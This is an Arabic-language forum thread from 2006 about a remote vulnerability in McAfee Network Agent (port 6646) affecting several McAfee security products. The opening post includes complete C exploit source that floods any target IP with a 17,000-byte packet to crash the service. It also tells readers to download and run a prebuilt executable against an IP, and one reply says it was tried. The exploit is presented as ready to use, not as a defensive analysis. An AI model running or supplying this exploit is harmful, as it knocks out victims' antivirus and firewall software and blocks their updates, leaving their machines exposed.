مجلس عبير التقنية شروحات برامج الكمبيوتر - الجديد في الإنترنت - Ios - Android


عدد مرات النقر : 32,637
عدد  مرات الظهور : 38,545,229

موضوع مغلق
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 13-12-2006, 11:33 PM   #1

الصورة الرمزية عبد الله الساهر

 رقم العضوية :  1
 تاريخ التسجيل :  22-07-2004
 المشاركات :  71,547
 الدولة :  ムレ3乃乇乇尺
 الجـنـس :  ذكر
 العمر :  38
 عدد النقاط :  243859
 قوة التقييم :  عبد الله الساهر تم تعطيل التقييم
 SMS :

حتى لو اجتهدت و قطعت فؤادك.. ووضعته للناس في طبق فضي ليرضوا عنك لن تفلح وربما لن تصل لمستوى يرضيك أنت عن نفسك فاجتهد ليكون الله وحده راضياً عنك وأغمض عينيك عن ما سواه

 اخر مواضيع » عبد الله الساهر
 تفاصيل مشاركات » عبد الله الساهر
 أوسمة و جوائز » عبد الله الساهر
 معلومات الاتصال بـ عبد الله الساهر

افتراضي ثغرة امنيه عن بعد لبرنامج مكافي سنتر Mcafee Network Agent


الثغرة من إكتشاف: JAAScois
تاريخ النشر: 12/10/2006 م
البرامج المصابه:
McAfee Wireless Protection
McAfee Internet Security Suite 2006
McAfee Personal Firewall Plus 7.x/2006
McAfee VirusScan 10.x/2006


مراجع اجنبيه
http://securitytracker.com/*********...t/1017057.html
http://www.securityfocus.com/bid/20496
ثغرة أمنية جديدة في طقم الحماية لشركة مكافي او كما هو اسمها مكافي سيكيورتي سنتر
وجدنا الثغره في برنامج وكيل الشبكة Mcafee Network Agent وهو البرنامج المسؤل عن فتح
المنفذ 6646 في الجهاز لتلقي اي معلومات من شبكة مكافي او تحديث او مشاركة ملفات مختلفه
الثغره تحدث في معالجة حزم البيانات المدخلة من خلال منفذ 6646 وفي مرحله متقدمة يبحث البرنامج
عن بيانات الجهاز المتصل وهو يتوقع وجدوها بداخل الحزمة المرسلة ويضع خيارين لاستلمها
اما ان يكون معرف الجهاز المتصل مكون من أرقام وهو يمثل IP او يكون مكون من حروف ويمثل مجال
انترنت ولكن في الخطأ هو استخدام رموز اخرى لا تقع ضمن الارقام من 1-9 او الحروف من a-z
ومثال على ذلك ترميز FF بالهكس ويحدث بعد ذلك خطأ في البرنامج ويتم غلقة بعد ظهور رسائل النظام

ملاحظات: الى الآن تعتبر الثغرة خطيرة فهي تمكن عن طريق IP فقط اغلاق برنامج شبكة مكافي ومنع التحديثات
ولكن توصلنا لطريقة تغيير مجرى تنفيذ البرنامج ولكن الى عنوان غير ثابت ومعنى ذلك امكانية تشغيل اكواد ضارة

لتجربة الثغرة , قم بتخزين البرنامج التالي وطريقة عملة بسيطة يتطلب رقم الآي بي مثال JcMc10.exe 190.160.24.1
البرنامج هنا JcMc10.exe

كود الاستغلال:

/////////////////////////////////////////////////////
// Mcafee Network Agent (mcnasvc.exe) Remote DoS
// By JAAScois [ http://www.jaascois.com ]
// Teston [ mcnasvc.exe ver1.0.178.0 ]
// Path [C:\Program Files\Common Files\McAfee\MNA]
// Port: [6646]
/////////////////////////////////////////////////////
#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")

int main (int argc, char *argv[]){

struct sockaddr_in tcp;
static SOCKET sock;
int ii=0;
unsigned char buf[17000];
WSADATA wsaData;

// packet
for(ii=0;ii<17000;ii++){
buf[ii]=0x90;
}

printf("[>>] Mcafee Network Agent (mcnasvc.exe ver 1.0.178.0) Remote DoS \n");
printf("[>>] By JAAScois [ http://www.jaascois.com ] \n");
printf("[>>] +\n");
printf("[>>] +\n");

if(argc<2){
printf("[>>] Usage:%s 190.160.24.1\n",argv[0]);
return 1;
}

if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
printf("[>>] WSAStartup failed !\n");
return 1;
}


sock=socket(AF_INET,SOCK_STREAM,0);
tcp.sin_addr.s_addr = inet_addr(argv[1]); // IP
tcp.sin_family = AF_INET;
tcp.sin_port=htons(6646);

if(connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in))==SOCKET_ERROR){
printf("[>>] connect failed !\n");
return 1;
}
send(sock,(char*)buf,17000,0);

printf("[>>] exploit sent successfully [%s]\n" , argv[1]);
closesocket(sock);
return 0;
}

توقيع :





رحمك الله يا أنس
وجعل الفردوس دارك ومستقرك



عبد الله الساهر متواجد حالياً
رسالة لكل زوار منتديات العبير

عزيزي الزائر أتمنى انك استفدت من الموضوع و لكن من اجل منتدى ارقي و ارقي برجاء عدم نقل الموضوع و يمكنك التسجيل معنا و المشاركة معنا و النقاش في كافه المواضيع الجاده اذا رغبت في ذلك فانا لا ادعوك للتسجيل بل ادعوك للإبداع معنا . للتسجيل اضغظ هنا .

قديم 16-12-2006, 07:34 PM   #2
Has A Reputation Beyond Repute

الصورة الرمزية أحمد نسيب

 رقم العضوية :  220
 تاريخ التسجيل :  17-10-2005
 المشاركات :  4,029
 الجـنـس :  ذكر
 عدد النقاط :  50215
 قوة التقييم :  أحمد نسيب has much to be proud ofأحمد نسيب has much to be proud ofأحمد نسيب has much to be proud ofأحمد نسيب has much to be proud ofأحمد نسيب has much to be proud ofأحمد نسيب has much to be proud ofأحمد نسيب has much to be proud ofأحمد نسيب has much to be proud ofأحمد نسيب has much to be proud ofأحمد نسيب has much to be proud ofأحمد نسيب has much to be proud of
 اخر مواضيع » أحمد نسيب
 تفاصيل مشاركات » أحمد نسيب
 أوسمة و جوائز » أحمد نسيب
 معلومات الاتصال بـ أحمد نسيب

افتراضي


المكافي بالنسبة لي افضل برنامج لكن مع وجود الثغرة خطير صار

توقيع :

سبحانك اللهم وبحمدَك

من يهتم بنفسه العليا يصبح رجلا عظيما، أما من يهتم بنفسه السفلي فيصبح رجل وضيعا.
منسيوس
فيلسوف صيني كونفوشيوسي قديم.

أحمد نسيب غير متواجد حالياً
قديم 29-12-2006, 01:49 AM   #3

الصورة الرمزية أمـ جود ـ

 رقم العضوية :  4
 تاريخ التسجيل :  22-07-2004
 المشاركات :  6,182
 العمر :  36
 عدد النقاط :  32
 قوة التقييم :  أمـ جود ـ is on a distinguished road
 اخر مواضيع » أمـ جود ـ
 تفاصيل مشاركات » أمـ جود ـ
 أوسمة و جوائز » أمـ جود ـ
 معلومات الاتصال بـ أمـ جود ـ

افتراضي


المشاكل مثل ما اقول لك


مع البرامج اخطر

توقيع :



مٍَآعُآدُ يًرٍضَيًنٍيً وَفٍآ...و لآيًزٍعُلنٍيً جََفٍآ..
مٍَتِسِآويًهُـ َفٍيً خٍآطَرٍيً ..ظِلمٍَـ آلبُشُرٍ وآنٍصِآَفٍهُمٍَـ..
ولو تِوَقٍَِفٍ آلدُنٍيًآ عُلىٍ شُمٍَعُ آلغٌَرٍآمٍَـ آلليً طََفٍآ..
بُعُضَ آلشُمٍَوعُ..أنٍآ أتِعُمٍَدُ گسِرٍهُآ وآتِلآَفٍهُآ..

أمـ جود ـ غير متواجد حالياً
قديم 04-01-2007, 05:07 PM   #4


 رقم العضوية :  2044
 تاريخ التسجيل :  03-01-2007
 المشاركات :  22
 عدد النقاط :  10
 قوة التقييم :  rasbia is on a distinguished road
 اخر مواضيع » rasbia
 تفاصيل مشاركات » rasbia
 أوسمة و جوائز » rasbia
 معلومات الاتصال بـ rasbia

افتراضي


ماجالي وجربته وزين عرفت بموضوع الثغره

توقيع :

[IMG][/IMG]

rasbia غير متواجد حالياً
موضوع مغلق

مواقع النشر (المفضلة)


أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة



الساعة الآن 01:05 PM


Powered by vBulletin® Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.6.0 TranZ By Almuhajir
Ads Organizer 3.0.3 by Analytics - Distance Education
جميع الحقوق محفوظة لـ : منتديات العبير
المحتوى المنشور فى موقع العبير لايعبر بالضرورة عن وجهة نظر الإدارة وإنما يعبر عن وجهة نظر كاتبها